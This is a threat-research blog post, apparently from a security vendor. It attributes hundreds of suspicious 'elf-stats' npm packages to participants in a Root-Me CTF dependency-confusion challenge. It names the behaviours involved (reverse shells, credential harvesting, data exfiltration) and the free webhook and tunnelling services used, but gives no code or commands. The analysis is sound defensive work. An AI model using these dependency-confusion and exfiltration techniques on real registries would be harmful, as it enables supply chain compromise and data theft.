Elf on a (npm) Shelf
Panther Threat Research Team
Dec 3, 2025
Executive Summary
On December 3, 2025, Socket.dev reported a surge of 432+ malicious npm packages with “elf-stats” naming patterns, initially flagged as a potential coordinated threat actor campaign. Through comprehensive behavioral analysis, infrastructure mapping, and temporal correlation, we have definitively attributed this activity to Root-Me’s XMAS CTF 2025 Day 3 challenge: “Confusion among the Elves,” a dependency confusion educational exercise designed by challenge author Cezame.
What Socket.dev Found
Socket.dev’s initial analysis correctly identified:
432+ malicious npm packages with elf-themed naming
Publication timing: Concentrated on December 3, 2025
Automated generation: Packages published every ~2 minutes
French connection: Author “cezame” and French language indicators
Malicious behaviors: Reverse shells, data exfiltration, credential harvesting
Multiple threat actors: Different naming schemes and automation patterns
Their analysis astutely noted: “Given the coordination and breadth of the behavior, it is possible there is more than one threat actor.”
What they couldn’t confirm: Whether this was legitimate security research, a CTF exercise, or actual malicious activity.
New Findings: The Complete Picture
Definitive Source Attribution
Root-Me XMAS CTF 2025 - Day 3 Challenge
“Every winter, the elves’ factory relies on a massive statistics system to optimize gift production… DevSecOops the elf spilled his eggnog… Your mission? Find a way to recover the list by accessing the production server!”
Several indicators show the packages are linked to this challenge. The first package was published ~25 minutes after the challenge was released. All packages have “Elf Workshop” strings in several fields, including the author field. The challenge creator is “cezame,” not a malicious actor as far as we have observed. The package descriptions also clearly state that these are automated packages and tests for the root-me challenge.
As of the time of writing the “Confusion among the Elves” challenge has been removed by Root-Me staff.
Participant Behavior Stratification
Our analysis of 144 packages from 54 unique participants reveals three distinct competitor categories: manual, semi-automated, and fully-automated. Users uploading payloads manually may be first-time CTF participants, while semi-automated and fully automated payload creators have greater technical skills. The variety of technical skills across the same payload types makes it less likely that these are threat actors belonging to the same attacker group for a coordinated campaign.
This skill stratification is the “smoking gun” proving this was a competitive CTF, not a coordinated attack. Sophisticated threat actors would standardize their tooling; CTF participants show natural variance based on experience level.
Infrastructure Analysis
Exfiltration Service Distribution
Service Type | Package Count | Typical Use Case | Risk Profile |
|---|---|---|---|
webhook.site | 62 | Developer testing | Free, public, logged |
Discord webhooks | 28 | Community chat | Requires account, semi-public |
xmasctf2025flag.* | 6 | CTF flag collection | CTF indicator |
requestcatcher.com | 4 | API testing | Free, temporary |
ngrok tunnels | 3 | Local dev tunneling | Ephemeral infrastructure |
beeceptor.com | 2 | Mock API service | Developer tool |
Threat actors commonly use all of these free tools as command and control infrastructure. Even for services that are logged and have account creation requirements, threat actors can easily create and recreate these accounts, as service providers identify and remove them. The explicit xmasctf2025flag domain used in some packages could be a false flag created by threat actors to pose as an educational CTF activity. This highlights the importance of correlating across multiple indicators for attribution, and shows that CTF participants learn from threat actors and vice versa.
The French Cybersecurity Education Ecosystem
EPITA Connection
Socket.dev noted French language indicators. One of the emails we collected from NPM users belongs to École Pour l’Informatique et les Techniques Avancées (EPITA), an engineering institute with a focus on computer science.
Root-Me Platform Context
Root-Me (root-me.org) is a French cybersecurity training platform founded in 2010 that allows users to practice with over 400 challenges across several domains, such as cryptography, forensics, networks, and systems. The community has more than 500,000 users worldwide and is currently undergoing an XMAS CTF format, an advent calendar from Dec 1 to Dec 24 with one challenge per day.
Timeline Reconstruction
Based on the temporal distribution of the package release, it is unlikely that these are coordinated attacks, as they span several hours.
Participant Entry Pattern:
Early adopters (11:00-12:00): 18% of participants — immediate engagement
Lunch break wave (12:00-13:00): 33% of participants — after-work/lunch competition
Main competition (13:00-15:00): 40% of participants — prime competitive window
Late solvers (15:00-16:39): 9% of participants — slower problem solvers
Package Metadata: The “Elf Workshop” Shared Identity
Socket.dev noted the “Elf Workshop” author field appearing across multiple packages. Our analysis reveals this was a challenge-suggested fake identity, not evidence of coordination:
Author Field Distribution:
Author Value | Package Count | Interpretation |
|---|---|---|
“Elf Workshop” | 60 (41.7%) | Suggested by challenge narrative |
null/empty | 64 (44.4%) | Participants who skipped author field |
Creative variations | 12 (8.3%) | “Santa Hacker Team”, “Miguel the Elf” |
Personal identifiers | 8 (5.6%) | “test”, “you”, “me”, “ctf-exploit” |
Given that the challenge description references an “elves’ factory”, it is possible that the “Elf Workshop” is a string marking for CTF staff and participants to keep track of users undergoing the challenge.
The Cleanup Gap
Despite the challenge author Cezame's explicit instruction to "clean up any files you create for this challenge—especially on external services—to avoid any hypothetical issues with your accounts," 144 packages remained live when Socket.dev conducted their analysis. This creates an interesting operational question.
The cleanup instruction appears to require individual action: Root-Me organizers likely lack access to participants' personal npm accounts (gmail.com, proton.me, etc.) to perform mass removal. Three factors may explain the incomplete cleanup: participant inexperience (37% were manual/beginner participants who may not understand npm unpublishing procedures or assumed organizers would handle it), technical barriers (forgotten credentials on throwaway accounts, or participants who published only 1-2 packages and moved on), and incentive misalignment (no scoring penalty for leaving packages, no cleanup automation provided).
It's also worth noting that the challenge was posted only hours before Socket.dev's analysis. Participants may simply not have cleaned up yet. The timing ambiguity in Cezame's instruction (cleanup immediately vs. after December 25th when write-ups are allowed) may have contributed to delayed action. However, the practical impact is clear: npm is already expending resources to manually remove these packages, creating operational burden on registry maintainers even for authorized educational exercises.
Implications for Supply Chain Security
This gap highlights a broader challenge for supply chain security education: realistic exercises require publishing to real registries, but incomplete cleanup pollutes the ecosystem and consumes security team resources investigating what ultimately proves to be legitimate educational activity.
Given the recent news of Sha1-Hulud hitting the NPM ecosystem, NPM packages are gaining traction in the cybersecurity community for a good reason. For security vendors, catching malicious code and managing false positives is a delicate balance to achieve. For this reason, performing a preliminary analysis, triaging, and attribution is critical to make sure that alarms are not raised at the first hint of suspicious activity.
Conclusion
The “Elves on npm” campaign was not a sophisticated threat actor operation, but rather 54 individual cybersecurity students and professionals competing in Root-Me’s XMAS CTF 2025, Day 3 challenge: “Confusion among the Elves.” This dependency confusion exercise, designed by challenge author Cezame, successfully taught supply chain attack techniques to a diverse international participant base with varying skill levels.
As supply chain security education grows, the industry must develop frameworks to support realistic exercises without creating collateral confusion. The alternative—avoiding public registries entirely—reduces educational value by removing real-world complexity.
This incident is not a failure of education or detection, but rather a case study in the growing pains of security monitoring in public ecosystems.
Hungry for more threat research? Read our latest Analysis of the Sha1-Hulud 2.0 Campaign next.
References
Socket.dev. (2025). “npm Sees Surge of Auto-Generated ‘elf-stats’ Packages.” https://socket.dev/blog/elves-on-npm
Root-Me. (2025). “XMAS CTF 2025.” https://ctf.xmas.root-me.org/
Recommended Resources
Ready for less noise
and more control?
See Panther in action. Book a demo today.
